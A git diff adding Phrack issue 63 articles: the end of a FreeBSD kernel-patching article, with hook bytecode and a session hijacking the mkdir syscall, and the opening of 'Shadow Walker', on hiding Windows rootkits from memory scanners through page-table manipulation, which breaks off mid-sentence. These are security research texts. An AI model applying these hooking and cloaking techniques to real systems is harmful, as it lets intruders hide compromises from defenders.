+c0541900 T mkdir
+c074a9bc B mkdirlisthd
+c047d270 t msdosfs_mkdir
+c05c7160 t nfs4_mkdir
+c05bcfd0 t nfs_mkdir
+c05db750 T nfsrv_mkdir
+c06a2676 r nfsv3err_mkdir
+c06216a0 t ufs_mkdir
+c06fef40 D vop_mkdir_desc
+c06fef64 d vop_mkdir_vp_offsets
+ghost@slavetwo:~#nm /boot/kernel/kernel | grep kern_rmdir
+c0541930 T kern_rmdir
+ghost@slavetwo:~#objdump -dR --start-address=0xc0541900
+--stop-address=0xc0541930 /boot/kernel/kernel | less
+
+/boot/kernel/kernel:     file format elf32-i386-freebsd
+
+Disassembly of section .text:
+
+c0541900 <mkdir>:
+c0541900:       55                      push   %ebp
+c0541901:       89 e5                   mov    %esp,%ebp
+c0541903:       83 ec 10                sub    $0x10,%esp
+c0541906:       8b 55 0c                mov    0xc(%ebp),%edx
+c0541909:       8b 42 04                mov    0x4(%edx),%eax
+c054190c:       c7 44 24 08 00 00 00    movl   $0x0,0x8(%esp)
+c0541913:       00
+c0541914:       89 44 24 0c             mov    %eax,0xc(%esp)
+c0541918:       8b 02                   mov    (%edx),%eax
+c054191a:       89 44 24 04             mov    %eax,0x4(%esp)
+c054191e:       8b 45 08                mov    0x8(%ebp),%eax
+c0541921:       89 04 24                mov    %eax,(%esp)
+c0541924:       e8 a7 fc ff ff          call   c05415d0 <kern_mkdir>
+c0541929:       c9                      leave
+c054192a:       c3                      ret
+c054192b:       90                      nop
+c054192c:       8d 74 26 00             lea    0x0(%esi),%esi
+
+ghost@slavetwo:~#
+
+	[---------------------------------------------------------]
+
+    The above output was generated from two different FreeBSD 5.4 builds. 
+As one can clearly see the dissassembly dump of mkdir is different for each
+one.
+
+    In test_hook the address of kern_rmdir is sought after, this is because
+in memory kern_rmdir comes right after mkdir, thus its address is the end
+boundary for mkdir.
+
+The bytecode for the call hook is as follows:
+
+unsigned char ha_code[] =
+        "\x4d"                          /* M                            */
+        "\x4b"                          /* K                            */
+        "\x44"                          /* D                            */
+        "\x49"                          /* I                            */
+        "\x52"                          /* R                            */
+        "\x20"                          /* sp                           */
+        "\x53"                          /* S                            */
+        "\x59"                          /* Y                            */
+        "\x53"                          /* S                            */
+        "\x43"                          /* C                            */
+        "\x41"                          /* A                            */
+        "\x4c"                          /* L                            */
+        "\x4c"                          /* L                            */
+        "\x20"                          /* sp                           */
+        "\x3a"                          /* :                            */
+        "\x20"                          /* sp                           */
+        "\x25"                          /* %                            */
+        "\x73"                          /* s                            */
+        "\x0a"                          /* nl                           */
+        "\x00"                          /* null                         */
+        "\x55"                          /* push   %ebp                  */
+        "\x89\xe5"                      /* mov    %esp,%ebp             */
+        "\x83\xec\x08"                  /* sub    $0x8,%esp             */
+        "\x8b\x45\x0c"                  /* mov    0xc(%ebp),%eax        */
+        "\x8b\x00"                      /* mov    (%eax),%eax           */
+        "\xc7\x04\x24\x0d\x00\x00\x00"  /* movl   $0xd,(%esp)           */
+        "\x89\x44\x24\x04"              /* mov    %eax,0x4(%esp)        */
+        "\xe8\xfc\xff\xff\xff"          /* call   17 <hacked_mkdir+0x17>*/
+        "\x31\xc0"                      /* xor    %eax,%eax             */
+        "\x83\xc4\x08"                  /* add    $0x8,%esp             */
+        "\x5d";                         /* pop    %ebp                  */
+
+    The first 20 bytes is for the string to be printed, because of this 
+when we jump to this function we have to start at an offset of 0x14, as 
+illustrated from this line of code:
+
+	*(unsigned long *)&jp_code[1] = (unsigned long)kma.addr + 0x14;
+
+    The last three statements in the hacked_mkdir bytecode zeros out the 
+eax register, cleans up the stack, and restores the ebp register. This is 
+done so that when mkdir actually executes its as if nothing has already
+occurred.
+
+   One thing to remember about character arrays in C is that they are all 
+null terminated. For example if we declare the following variable,
+
+	unsigned char example[] = "\x41";
+
+sizeof(example) will return 2. This is the reason why in test_hook we
+subtract 1 from sizeof(ha_code), otherwise we would be writing to the
+wrong spot.
+
+The following is the output before and after running test_hook:
+
+	[---------------------------------------------------------]
+
+ghost@slavetwo:~#ls
+test_hook.c
+ghost@slavetwo:~#gcc -o test_hook test_hook.c -lkvm
+ghost@slavetwo:~#mkdir before
+ghost@slavetwo:~#ls -F
+before/      test_hook*   test_hook.c
+ghost@slavetwo:~#sudo ./test_hook
+Password:
+I love the PowerGlove. It's so bad!
+ghost@slavetwo:~#mkdir after
+MKDIR SYSCALL : after
+ghost@slavetwo:~#ls -F
+after/       before/      test_hook*   test_hook.c
+ghost@slavetwo:~#
+
+	[---------------------------------------------------------]
+
+One could also use find_syscall and ddb to verify the results of test_hook
+
+
+--[ 6.0 - Concluding Remarks
+
+    Being able to patch and allocate kernel memory gives one a lot of power
+over a system. All the examples in this article are trivial as it was my
+intention to show the how not the what. Other authors have better ideas
+than me anyways on what to do (see References).
+
+    I would like to take this space to apologize if any of my explanations
+are unclear, hopefully reading over the source code and looking at the 
+output makes up for it.
+
+    Finally, I would like to thank Silvio Cesare, pragmatic, and Stephanie
+Wehner, for the inspiration/ideas.
+
+
+--[ 7.0 - References
+
+  [ Internet ]
+
+  [1] Silvio Cesare, "Runtime Kernel Kmem Patching"
+      http://reactor-core.org/runtime-kernel-patching.html
+
+  [2] devik & sd, "Linux on-th-fly kernel patching without LKM"
+      http://www.phrack.org/show.php?p=58&a=7
+
+  [3] pragmatic, "Attacking FreeBSD with Kernel Modules"
+      http://www.thc.org/papers/bsdkern.html
+
+  [4] Andrew Reiter, "Dynamic Kernel Linker (KLD) Facility Programming
+                      Tutorial"
+      http://ezine.daemonnews.org/200010/blueprints.html
+
+  [5] Stephanie Wehner, "Fun and Games with FreeBSD Kernel Modules"
+      http://www.r4k.net/mod/fbsdfun.html
+
+  [ Books ]
+
+  [6] Muhammad Ali Mazidi & Janice Gillispie Mazidi, "The 80x86 IBM PC And
+      Compatible Computers: Assembly Language, Design, And Interfacing"
+      (Prentice Hall)
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack63/8.txt b/phrack63/8.txt
new file mode 100644
index 0000000..f75515e
--- /dev/null
+++ b/phrack63/8.txt
@@ -0,0 +1,1224 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x08 of 0x14
+
+
+|=-------------------------=[ Shadow Walker ]=---------------------------=|
+|=--------=[ Raising The Bar For Windows Rootkit Detection ]=------------=|
+|=-----------------------------------------------------------------------=|
+|=---------=[ Sherri Sparks <ssparks at mail.cs.ucf dot edu > ]=---------=|
+|=---------=[ Jamie Butler <james.butler at hbgary dot com >  ]=---------=|
+      
+0 - Introduction & Background On Rootkit Technology                        
+  0.1 - Motivations                                                        
+      
+1 - Rootkit Detection                                                      
+  1.1 - Detecting The Effect Of A Rootkit (Heuristics)                     
+  1.2 - Detecting The Rootkit Itself (Signatures)                          
+      
+2 - Memory Architecture Review                                             
+  2.1 - Virtual Memory - Paging vs. Segmentation                           
+  2.2 - Page Tables & PTE's                                                
+  2.3 - Virtual to Physical Address Translation                            
+  2.4 - The Role of the Page Fault Handler                                 
+  2.5 - The Paging Performance Problem & the TLB                           
+      
+3 - Memory Cloaking Concept                                                
+  3.1 - Hiding Executable Code                                             
+  3.2 - Hiding Pure Data                                                   
+  3.3 - Related Work                                                       
+  3.4 - Proof of Concept Implementation                                    
+      3.4.a - Modified FU Rootkit                                          
+      3.4.b - Shadow Walker Memory Hook Engine                             
+                                   
+4 - Known Limitations & Performance Impact
+                                  
+5 - Detection
+     
+6 - Conclusion                                                             
+      
+7 - References 
+
+8 - Acknowlegements                                           
+      
+--[ 0 - Introduction & Background                                          
+
+Rootkits have historically demonstrated a co-evolutionary adaptation and   
+response to the development of defensive technologies designed to
+apprehend their subversive agenda.  If we trace the evolution of rootkit 
+technology, this pattern is evident.  First generation rootkits were 
+primitive.  They  simply replaced / modified key system files on the 
+victim's system.  The UNIX login program was a common target and involved
+an attacker replacing the original binary with a maliciously enhanced 
+version that logged user passwords.  Because these early rootkit 
+modifications were limited to system files on disk, they motivated the 
+development of file system integrity checkers such as Tripwire [1].        
+          
+In response, rootkit developers moved their modifications off disk to the  
+memory images of the loaded programs and, again, evaded detection. These   
+'second' generation rootkits were primarily based upon hooking techniques
+that altered the execution path by making memory patches to loaded         
+applications and some operating system components such as the system call  
+table. Although much stealthier, such modifications remained detectable by 
+searching for heuristic abnormalities. For example, it is suspicious for   
+the system service table to contain pointers that do not point to the      
+operating system kernel. This is the technique used by VICE [2].           
+
+Third generation kernel rootkit techniques like Direct Kernel Object       
+Manipulation (DKOM), which was implemented in the FU rootkit [3], 
+capitalize on the weaknesses of current detection software by modifying 
+dynamically changing kernel data structures for which it is impossible to 
+establish a static trusted baseline.
+      
+----[ 0.1 - Motivations
+                                                    
+There are public rootkits which illustrate all of these various techniques,
+but even the most sophisticated Windows kernel rootkits, like FU, possess  
+an inherent flaw. They subvert essentially all of the operating system's   
+subsystems with one exception: memory management. Kernel rootkits can      
+control the execution path of kernel code, alter kernel data, and fake     
+system call return values, but they have not (yet) demonstrated the        
+capability to 'hook' or fake the contents of memory seen by other running  
+applications.  In other words, public kernel rootkits are sitting ducks for
+in memory signature scans.  Only now are security companies beginning to 
+think of implementing memory signature scans.                              
+                                                                           
+Hiding from memory scans is similar to the problem faced by early viruses 
+attempting to hide on the file system. Virus writers reacted to anti-virus 
+programs scanning the file system by developing polymorphic and metamorphic
+techniques to evade detection.  Polymorphism attempts to alter the binary  
+image of a virus by replacing blocks of code with functionally equivalent  
+blocks that appear different (i.e. use different opcodes to perform the    
+same task).  Polymorphic code, therefore, alters the superficial appearance
+of a block of code, but it does not fundamentally alter a scanner's view of
+that region of system memory.                                              
+                                                                           
+Traditionally, there have been three general approaches to malicious code  
+detection: misuse detection, which relies upon known code signatures,      
+anomaly detection, which relies upon heuristics and statistical deviations 
+from 'normal' behavior, and integrity checking which relies upon comparing 
+current snapshots of the file system or memory with a known, trusted       
+baseline.  A polymorphic rootkit (or virus) effectively evades signature   
+based detection of its code body, but falls short in anomaly or integrity  
+detection schemes because it cannot easily camouflage the changes it makes 
+to existing binary code in other system components.                        
+                                                                           
+Now imagine a rootkit that makes no effort to change its superficial       
+appearance, yet is capable of fundamentally altering a detectors view of an
+arbitrary region of memory. When the detector attempts to read any region  
+of memory modified by the rootkit, it sees a 'normal', unaltered view of   
+memory. Only the rootkit sees the true, altered view of memory. Such a     
+rootkit is clearly capable of compromising all of the primary detection    
+methodologies to varying degrees.  The implications to misuse detection are
+obvious. A scanner attempts to read the memory for the loaded rootkit      
+driver looking for a code signature and the rootkit simply returns a       
+random, 'fake' view of memory (i.e. which does not include its own code) to
+the scanner.  There are also implications for integrity validation         
+approaches to detection.  In these cases, the rootkit returns the unaltered
+view of memory to all processes other than itself.  The integrity checker  
+sees the unaltered code, finds a matching CRC or hash, and (erroneously)   
+assumes that all is well.  Finally, any anomaly detection methods which    
+rely upon identifying deviant structural characteristics will be fooled    
+since they will receive a 'normal' view of the code. An example of this    
+might be a scanner like VICE which attempts to heuristically identify      
+inline function hooks by the presence of a direct jump at the beginning of 
+the function body.                                                         
+
+Current rootkits, with the exception of Hacker Defender [4], have made 
+little or no effort to introduce viral polymorphism techniques.  As stated 
+previously, while a valuable technique, polymorphism is not a comprehensive
+solution to the problem for a rootkit because the rootkit cannot easily    
+camouflage the changes it must make to existing code in order to install   
+its hooks.  Our objective, therefore, is to show proof of concept that the 
+current architecture permits subversion of memory management such that a   
+non polymorphic kernel mode rootkit (or virus) is capable of controlling   
+the view of memory regions seen by the operating system and other processes
+with a minimal performance hit. The end result is that it is possible to   
+hide a 'known' public rootkit driver (for which a code signature exists)   
+from detection.  To this end, we have designed an 'enhanced' version of the
+FU rootkit. In section 1, we discuss the basic techniques used to detect a 
+rootkit. In section 2, we give a background summary of the x86 memory      
+architecture.  Section 3 outlines the concept of memory cloaking and proof 
+of concept implementation for our enhanced rootkit.  Finally, we           
+conclude with a discussion of its detectability, limitations, future       
+extensibility, and performance impact.  Without further ado, we bid you    
+welcome to 4th generation rootkit technology.                              
+      
+--[ 1 - Rootkit Detection                                                  
+      
+Until several months ago, rootkit detection was largely ignored by security
+vendors. Many mistakenly classified rootkits in the same category as other 
+viruses and malware. Because of this, security companies continued to use  
+the same detection methods the most prominent one being signature scans on 
+the file system. This is only partially effective. Once a rootkit is loaded
+in memory is can delete itself on disk, hide its files, or even divert an  
+attempt to open the rootkit file. In this section, we will examine more    
+recent advances in rootkit detection.                                      
+      
+----[ 1.2 - Detecting The Effect Of A Rootkit (Heuristics)                 
+      
+One method to detect the presence of a rootkit is to detect how it alters  
+other parameters on the computer system. In this way, the effects of the   
+rootkit are seen although the actual rootkit that caused the deviation may 
+not be known. This solution is a more general approach since no signature  
+for a particular rootkit is necessary. This technique is also looking for  
+the rootkit in memory and not on the file system.                          
+      
+One effect of a rootkit is that it usually alters the execution path of a  
+normal program. By inserting itself in the middle of a program's execution,
+the rootkit can act as a middle man between the kernel functions the       
+program relies upon and the program. With this position of power, the      
+rootkit can alter what the program sees and does. For example, the rootkit 
+could return a handle to a log file that is different from the one the     
+program intended to open, or the rootkit could change the destination of   
+network communication. These rootkit patches or hooks cause extra          
+instructions to be executed. When a patched function is compared to a      
+normal function, the difference in the number of instructions executed can
+be indicative of a rootkit. This is the technique used by PatchFinder [5]. 
+One of the drawbacks of PatchFinder is that the CPU must be put into single
+step mode in order to count instructions. So for every instruction executed
+an interrupt is fired and must be handled. This slows the performance of   
+the system, which may be unacceptable on a production machine. Also, the   
+actual number of instructions executed can vary even on a clean system.    
+Another rootkit detection tool called VICE detects the presence of hooks in
+applications and in the kernel . VICE analyzes the addresses of the        
+functions exported by the operating system looking for hooks. The exported 
+functions are typically the target of rootkits because by filtering certain
+APIs rootkits can hide. By finding the hooks themselves, VICE avoids the   
+problems associated with instruction counting. However, VICE also relies   
+upon several APIs so it is possible for a rootkit to defeat its hook
+detection [6]. Currently the biggest weakness of VICE is that it detects 
+all hooks both malicious and benign. Hooking is a legitimate technique used
+by many security products.                                                 
+      
+Another approach to detecting the effects of a rootkit is to identify the  
+operating system lying. The operating system exposes a well-known API in   
+order for applications to interact with it. When the rootkit alters the    
+results of a particular API, it is a lie. For example, Windows Explorer may
+request the number of files in a directory using several functions in the  
+Win32 API. If the rootkit changes the number of files that the application 
+can see, it is a lie. To detect the lie, a rootkit detector needs at least 
+two ways to obtain the same information. Then, both results can be
+compared. RootkitRevealer [7] uses this technique. It calls the highest 
+level APIs and compares those results with the results of the lowest level 
+APIs. This method can be bypassed by a rootkit if it also hooks at those 
+lowest layers. RootkitRevealer also does not address data alterations. The 
+FU rootkit alters the kernel data structures in order to hide its 
+processes. RootkitRevealer does not detect this because both the higher and
+lower layer APIs return the same altered data set. Blacklight from F-Secure
+[8] also tries to detect deviations from the truth. To detect hidden 
+processes, it relies on an undocumented kernel structure. Just as FU walks 
+the linked list of processes to hide, Blacklight walks a linked list of 
+handle tables in the kernel. Every process has a handle table; therefore, 
+by identifying all the handle tables Blacklight can find a pointer to every
+process on the computer. FU has been updated to also unhook the hidden 
+process from the linked list of handle tables. This arms race will 
+continue.                
+      
+----[ 1.2 - Detecting the Rootkit Itself (Signatures)                      
+      
+Anti-virus companies have shown that scanning file systems for signatures
+can be effective; however, it can be subverted. If the attacker camouflages
+the binary by using a packing routine, the signature may no longer match   
+the rootkit. A signature of the rootkit as it will execute in memory is one
+way to solve this problem. Some host based intrusion prevention systems    
+(HIPS) try to prevent the rootkit from loading. However, it is extremely   
+difficult to block all the ways code can be loaded in the kernel . Recent  
+papers by Jack Barnaby [9] and Chong [10] have highlighted the threat of 
+kernel exploits, which will allow arbitrary code to be loaded into memory 
+and executed.                                                              
+      
+Although file system scans and loading detection are needed, perhaps the   
+last layer of detection is scanning memory itself. This provides an added  
+layer of security if the rootkit has bypassed the previous checks. Memory  
+signatures are more reliable because the rootkit must unpack or unencrypt  
+in order to execute. Not only can scanning memory be used to find a        
+rootkit, it can be used to verify the integrity of the kernel itself since 
+it has a known signature. Scanning kernel memory is also much faster than
+scanning everything on disk. Arbaugh et. al. [11] have taken this technique
+to the next level by implementing the scanner on a separate card with its 
+own CPU. 
+
+The next section will explain the memory architecture on Intel x86.   
+      
+--[ 2 - Memory Architecture Review                                         
+      
+In early computing history, programmers were constrained by the amount of  
+physical memory contained in a system.  If a program was too large to fit  
+into memory, it was the programmer's responsibility to divide the program  
+into pieces that could be loaded and unloaded on demand. These pieces were 
+called overlays.  Forcing this type of memory management upon user level   
+programmers increased code complexity and programming errors while reducing
+efficiency.  Virtual memory was invented to relieve programmers of these   
+burdens.                                                                   
+      
+----[ 2.1 - Virtual Memory - Paging vs. Segmentation                       
+      
+Virtual memory is based upon the separation of the virtual and physical    
+address spaces. The size of the virtual address space is primarily a       
+function of the width of the address bus whereas the size of the physical  
+address space is dependent upon the quantity of RAM installed in the       
+system. Thus, a system possessing a 32 bit bus is capable of addressing    
+2^32 (or ~4 GB) physical bytes of contiguous memory. It may, however, not  
+have anywhere near that quantity of RAM installed. If this is the case,    
+then the virtual address space will be larger than the physical address    
+space. Virtual memory divides both the virtual and physical address spaces 
+into fixed size blocks. If these blocks are all the same size, the system  
+is said to use a paging memory model. If the blocks are varying sizes, it  
+is considered to be a segmentation model. The x86 architecture is in fact a
+hybrid, utlizing both segementation and paging, however, this article      
+focuses primarily upon exploitation of its paging mechanism.               
+      
+Under a paging model, blocks of virtual memory are referred to as pages and
+blocks of physical memory are referred to as frames. Each virtual page maps
+to a designated physical frame. This is what enables the virtual address   
+space seen by programs to be larger than the amount of physically          
+addressable memory (i.e. there may be more pages than physical frames). It 
+also means that virtually contiguous pages do not have to be physically    
+contiguous. These points are illustrated by Figure 1.                      
+      
+   VIRTUAL ADDRESS                      PHYSICAL ADDRESS                   
+        SPACE                                SPACE                         
+   /-------------\                      /-------------\                    
+   |             |                      |             |                    
+   |   PAGE 01   |---\   /----------->>>|  FRAME 01   |                    
+   |             |   |   |              |             |                    
+   ---------------   |   |              ---------------                    
+   |             |   |   |              |             |                    
+   |   PAGE 02   |------------------->>>|  FRAME 02   |                    
+   |             |   |   |              |             |                    
+   ---------------   |   |              ---------------                    
+   |             |   |   |              |             |                    
+   |   PAGE 03   |   \---|----------->>>|  FRAME 03   |                    
+   |             |       |              |             |                    
+   ---------------       |              \-------------/                    
+   |             |       |                                                 
+   |   PAGE 04   |       |                                                 
+   |             |       |                                                 
+   |-------------|       |                                                 
+   |             |       |                                                 
+   |   PAGE 05   |-------/                                                 
+   |             |                                                         
+   \-------------/                                                         
+      
+   [ Figure 1 - Virtual To Physical Memory Mapping (Paging)         ]      
+   [                                                                ]      
+   [ NOTE: 1. Virtual & physical address spaces are divided into    ]      
+   [ fixed size blocks. 2. The virtual address space may be larger  ]      
+   [ than the physical address space. 3. Virtually contiguous       ]      
+   [ blocks to not have to be mapped to physically contiguous       ]      
+   [ frames.                                                        ]      
+      
+----[ 2.2 - Page Tables & PTE's
+      
+The mapping information that connects a virtual address with its physical  
+frame is stored in page tables in structures known as PTE's. PTE's also    
+store status information. Status bits may indicate, for example, weather or
+not a page is valid (physically present in memory versus stored on disk),  
+if it is writable, or if it is a user / supervisor page. Figure 2 shows the
+format for an x86 PTE.                                                     
+      
+   Valid          <------------------------------------------------\       
+   Read/Write     <--------------------------------------------\   |       
+   Privilege      <----------------------------------------\   |   |       
+   Write Through  <------------------------------------\   |   |   |       
+   Cache Disabled <--------------------------------\   |   |   |   |       
+   Accessed       <---------------------------\    |   |   |   |   |       
+   Dirty          <-----------------------\   |    |   |   |   |   |       
+   Reserved       <-------------------\   |   |    |   |   |   |   |       
+   Global         <---------------\   |   |   |    |   |   |   |   |       
+   Reserved       <----------\    |   |   |   |    |   |   |   |   |       
+   Reserved       <-----\    |    |   |   |   |    |   |   |   |   |       
+   Reserved       <-\   |    |    |   |   |   |    |   |   |   |   |       
+                    |   |    |    |   |   |   |    |   |   |   |   |       
+   +----------------+---+----+----+---+---+---+----+---+---+---+---+-+     
+   |              |   |   |    |    |   |   |   |    |   | U | R |   |     
+   | PAGE FRAME # | U | P | Cw | Gl | L | D | A | Cd | Wt| / | / | V |     
+   |              |   |   |    |    |   |   |   |    |   | S | W |   |     
+   +-----------------------------------------------------------------+     
+      
+   [ Figure 2 - x86 PTE FORMAT (4 KBYTE PAGE) ]                            
+      
+      
+----[ 2.4 - Virtual To Physical Address Translation                        
+      
+Virtual addresses encode the information necessary to find their PTE's in  
+the page table. They are divided into 2 basic parts: the virtual page      
+number and the byte index.  The virtual page number provides the index into
+the page table while the byte index provides an offset into the physical   
+frame. When a memory reference occurs, the PTE for the page is looked up in
+the page table by adding the page table base address to the virtual page   
+number * PTE entry size. The base address of the page in physical memory is
+then extracted from the PTE and combined with the byte offset to define the
+physical memory address that is sent to the memory unit.  If the virtual   
+address space is particularly large and the page size relatively small, it 
+stands to reason that it will require a large page table to hold all of the
+mapping information. And as the page table must remain resident in main    
+memory, a large table can be costly. One solution to this dilemma is to use
+a multi-level paging scheme.  A two-level paging scheme, in effect, pages  
+the page table. It further subdivides the virtual page number into a page  
+directory and a page table index. The page directory is simply a table of  
+pointers to page tables. This two level paging scheme is the one supported 
+by the x86. Figure 3 illustrates how the virtual address is divided up to  
+index the page directory and page tables and Figure 4 illustrates the      
+process of address translation.                                            
+      
+   +---------------------------------------+                               
+   | 31                                 12 |                 0             
+   | +----------------+ +----------------+ | +---------------+             
+   | | PAGE DIRECTORY | |   PAGE TABLE   | | |  BYTE INDEX   |             
+   | |     INDEX      | |     INDEX      | | |               |             
+   | +----------------+ +----------------+ | +---------------+             
+   |       10 bits            10 bits      |      12 bits                  
+   |                                       |                               
+   |         VIRTUAL PAGE NUMBER           |                               
+   +---------------------------------------+                               
+      
+   [ Figure 3 - x86 Address & Page Table Indexing Scheme ]                 
+      
+        
+     +--------+                                                            
+   /-|KPROCESS|                                                            
+   | +--------+                                                            
+   |               Virtual Address                                         
+   | +------------------------------------------+                          
+   | | Page Directory | Page Table | Byte Index |                          
+   | |     Index      |   Index    |            |                          
+   | +-+-------------------+-------------+------+                          
+   |   | +---+             |             |                                 
+   |   | |CR3| Physical    |             |                                 
+   |   | +---+ Address Of  |             |                                 
+   |   |       Page Dir    |             |                                 
+   |   |                   |             \------ -\                        
+   |   |                   |                      |                       
+   |   |  Page Directory   |       Page Table     |     Physical Memory    
+   \---|->+------------+   | /-->+------------+   \---->+------------+     
+       |  |            |   | |   |            |         |            |     
+       |  |            |   | |   |            |         |            |     
+       |  |            |   | |   |            |         |------------|     
+       |  |            |   | |   |            |         |            |     
+       |  |------------|   | |   |            |         |   Page     |     
+       \->|    PDN     |---|-/   |            |         |   Frame    |     
+          |------------|   |     |            |      /---->          |     
+          |            |   |     |            |      |  |------------|     
+          |            |   |     |            |      |  |            |     
+          |            |   |     |            |      |  |            |     
+          |            |   |     |            |      |  |            |     
+          |            |   |     |------------|      |  |            |     
+          |            |   \---->|    PFN     -------/  |            |     
+          |            |         |------------|         |            |     
+          +------------+         +------------+         +------------+     
+          (1 per process)      (512 per processs)                          
+      
+   [ Figure 4 - x86 Address Translation ]                                
+ 
+     
+A memory access under a 2 level paging scheme potentially involves the     
+following sequence of steps.                                               
+      
+1. Lookup of page directory entry (PDE).
+   Page Directory Entry = Page Directory Base Address + sizeof(PDE) * Page 
+   Directory Index (extracted from virtual address that caused the  memory 
+   access)
+   NOTE: Windows maps the page directory to virtual address 0xC0300000. 
+   Base addresses for page directories are also located in KPROCESS blocks 
+   and the register cr3 contains the physical address of the current 
+   page directory.  
+      
+2. Lookup of page table entry.                                             
+   Page Table Entry = Page Table Base Address + sizeof(PTE) * Page Table
+   Index (extracted from virtual address that caused the memory access).   
+   NOTE: Windows maps the page directory to virtual address 0xC0000000.
+   The base physical address for the page table is also stored in the page 
+   directory entry.                                                        
+      
+3. Lookup of physical address.                                             
+   Physical Address = Contents of PTE + Byte Index                         
+   NOTE: PTEs hold the physical address for the physical frame. This is 
+   combined with the byte index (offset into the frame) to form the 
+   complete physical address. For those who prefer code to explanation, the
+   following two routines show how this translation occurs. The first 
+   routine, GetPteAddress performs steps 1 and 2 described above. It 
+   returns a pointer to the page table entry for a given virtual address. 
+   The second routine returns the base physical address of the frame to 
+   which the page is mapped.
+      
+#define PROCESS_PAGE_DIR_BASE                  0xC0300000
+#define PROCESS_PAGE_TABLE_BASE                0xC0000000
+typedef unsigned long* PPTE;
+      
+/**************************************************************************
+* GetPteAddress - Returns a pointer to the page table entry corresponding  
+*                 to a given memory address.                               
+*     
+* Parameters:
+*       PVOID VirtualAddress - Address you wish to acquire a pointer to the
+*                              page table entry for.                       
+*     
+* Return - Pointer to the page table entry for VirtualAddress or an error  
+*          code.                                                           
+*     
+* Error Codes:                                                             
+*       ERROR_PTE_NOT_PRESENT - The page table for the given virtual 
+*                               address is not present in memory.          
+*      ERROR_PAGE_NOT_PRESENT - The page containing the data for the       
+*                               given virtual address is not present in    
+*                               memory.                                    
+**************************************************************************/
+PPTE GetPteAddress( PVOID VirtualAddress )                                 
+{     
+        PPTE pPTE = 0;                                                     
+        __asm                                                              
+        {                                                                  
+                cli                     //disable interrupts               
+                pushad                                                     
+                mov esi, PROCESS_PAGE_DIR_BASE                             
+                mov edx, VirtualAddress                                    
+                mov eax, edx                                               
+                shr eax, 22                                                
+                lea eax, [esi + eax*4]  //pointer to page directory entry  
+                test [eax], 0x80        //is it a large page?              
+                jnz Is_Large_Page       //it's a large page                
+                mov esi, PROCESS_PAGE_TABLE_BASE                           
+                shr edx, 12                                                
+                lea eax, [esi + edx*4]  //pointer to page table entry (PTE)
+                mov pPTE, eax                                              
+                jmp Done                                                   
+      
+                //NOTE: There is not a page table for large pages because 
+                //the phys frames are contained in the page directory.     
+                Is_Large_Page:                                             
+                mov pPTE, eax                                              
+      
+                Done:                                                      
+                popad                                                      
+                sti                    //reenable interrupts               
+        }//end asm                                                         
+      
+        return pPTE;                                                       
+      
+}//end GetPteAddress                                                       
+      
+/**************************************************************************
+* GetPhysicalFrameAddress - Gets the base physical address in memory where 
+*                           the page is mapped. This corresponds to the    
+*                           bits 12 - 32 in the page table entry.          
+*     
+* Parameters -                                                             
+*       PPTE pPte - Pointer to the PTE that you wish to retrieve the 
+*       physical address from.                                             
+*     
+* Return - The physical address of the page.                               
+**************************************************************************/
+ULONG GetPhysicalFrameAddress( PPTE pPte )                                 
+{     
+        ULONG Frame = 0;                                                   
+      
+        __asm                                                              
+        {                                                                  
+                cli                                                        
+                pushad                                                     
+                mov eax, pPte                                              
+                mov ecx, [eax]                                             
+                shr ecx, 12  //physical page frame consists of the         
+                             //upper 20 bits
+                mov Frame, ecx                                             
+                popad                                                      
+                sti                                                        
+        }//end asm                                                         
+        return Frame;                                                      
+      
+}//end GetPhysicalFrameAddress                                             
+      
+      
+----[ 2.5 - The Role Of The Page Fault Handler                             
+      
+Since many processes only use a small portion of their virtual address     
+space, only the used portions are mapped to physical frames. Also, because 
+physical memory may be smaller than the virtual address space, the OS may  
+move less recently used pages to disk (the pagefile) to satisfy current    
+memory demands. Frame allocation is handled by the operating system. If a  
+process is larger than the available quantity of physical memory, or the   
+operating system runs out of free physical frames, some of the currently   
+allocated frames must be swapped to disk to make room. These swapped out   
+pages are stored in the page file. The information about whether or not a  
+page is resident in main memory is stored in the page table entry. When a  
+memory access occurs, if the page is not present in main memory a page     
+fault is generated.  It is the job of the page fault handler to issue the  
+I/O requests to swap out a less recently used page if all of the available 
+physical frames are full and then to bring in the requested page from the  
+pagefile.  When virtual memory is enabled, every memory access must be     
+looked up in the page table to determine which physical frame it maps to   
+and whether or not it is present in main memory. This incurs a substantial 
+performance overhead, especially when the architecture is based upon a     
+multi-level page table scheme like the Intel Pentium. The memory access    
+page fault path can be summarized as follows.                              
+      
+1. Lookup in the page directory to determine if the page table for the     
+   address is present in main memory.                                      
+2. If not, an I/O request is issued to bring in the page table from disk.  
+3. Lookup in the page table to determine if the requested page is present  
+   in main memory.                                                         
+4. If not, an I/O request is issued to bring in the page from disk.        
+5. Lookup the requested byte (offset) in the page.                         
+      
+Therefore every memory access, in the best case, actually requires 3 memory
+accesses : 1 to access the page directory, 1 to access the page table, and 
+1 to get the data at the correct offset.  In the worst case, it may require
+an additional 2 disk I/Os (if the pages are swapped out to disk). Thus, 
+virtual memory incurs a steep performance hit.                             
+      
+----[ 2.6 - The Paging Performance Problem & The TLB                       
+      
+The translation lookaside buffer (TLB) was introduced to help mitigate this
+problem. Basically, the TLB is a hardware cache which holds frequently used
+virtual to physical mappings. Because the TLB is implemented using         
+extremely fast associative memory, it can be searched for a translation    
+much faster than it would take to look that translation up in the page     
+tables.  On a memory access, the TLB is first searched for a valid 
+translation. If the translation is found, it is termed a TLB hit. 
+Otherwise, it is a miss.  A TLB hit, therefore, bypasses the slower page 
+table lookup. Modern TLB's have an extremely high hit rate and        
+therefore seldom incur miss penalty of looking up the translation in the   
+page table.                                                                
+               
+--[ 3 - Memory Cloaking Concept                                            
+      
+One goal of an advanced rootkit is to hide its changes to executable code
+(i.e. the placement of an inline patch, for example).  Obviously, it may
+also wish to hide its own code from view.  Code, like data, sits in memory
+and we may define the basic forms of memory access as:
+
+  - EXECUTE
+  - READ
+  - WRITE
+
+Technically speaking, we know that each virtual page maps to a physical    
+page frame defined by a certain number of bits in the page table entry.    
+What if we could filter memory accesses such that EXECUTE accesses mapped  
+to a different physical frame than READ / WRITE accesses? From a rootkit's 
+perspective, this would be highly advantageous.  Consider the case of an   
+inline hook. The modified code would run normally, but any attempts to read
+(i.e. detect) changes to the code would be diverted to a 'virgin' physical 
+frame that contained a view of the original, unaltered code. Similarly, a  
+rootkit driver might hide itself by diverting READ accesses within its     
+memory range off to a page containing random garbage or to a page          
